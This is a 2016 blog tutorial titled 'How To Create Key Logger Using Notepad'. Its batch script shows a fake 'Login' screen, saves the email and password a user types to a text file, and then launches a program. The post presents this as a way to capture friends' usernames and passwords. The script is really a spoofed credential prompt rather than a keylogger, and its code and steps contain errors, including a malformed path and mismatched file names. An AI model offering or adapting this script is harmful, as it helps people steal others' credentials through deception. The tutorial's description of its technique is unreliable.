Thursday 21 July 2016

How To Create Key Logger Using Notepad


Today i am going to show you how to create a Keylogger all using notepad only.By using this trick you can record Keystrokes in PC easily without installing any king of Thirdparty software that may  record your keystrokes instead.

A keylogger is a type of surveillance software that has the capability to record every keystroke you make to a log file, usually encrypted. Every type of keylogger is dangerous as they can record your keystrokes, tracks your activity and can record the open sites. By this, your any account can be easily hacked by the hackers. These keyloggers can detect your bank accounts passwords too. And these type of keylogger can also be created with the notepad text editor. So, lets know how to create a keylogger using notepad


How To Create Key Logger Using Notepad
This is a very easy method to create keylogger all you need a notepad and copy paste skill.So Just Follow the post below to Proceed

Creating a key Logger  using Notepad

STEP 1:First of all, you need to open notepad in your windows by pressing Window button and then selecting the notepad from the options. Now in notepad copy and paste the below code in it.

@echo off
color a
title Login
cls
echo Please Enter Your Email Address And Password
echo.
echo.
cd “C:Logs”
set /p user=Username:
set /p pass=Password:
echo Username=”%user%” Password=”%pass%” >> Log.txt
start >>Program Here<<
exit


STEP 2 Now save this file as Logs.bat on your desktop.


STEP 3 Now create a new folder named logs. (Note that keylogger will only work if the folder name is logs). Cut the folder and paste it into drive C

Step 4. Now test your file Log.bat and then after entering the Username and password


Step 5. Open the folder in C drive and see all saved key logs there as a text file created there automatically.


That’s it! you are done, you have successfully created a keylogger in notepad.

So above is all about How To Create a Keylogger Using Notepad. With this method, you can easily record out the keystrokes of your keyboard that had been entered in the batch file. And you also use it to shock your friends by telling them their username and password with this. Hope you like the post, don’t forget to share and leave a comment below if you have any related query.

No comments:
Write comments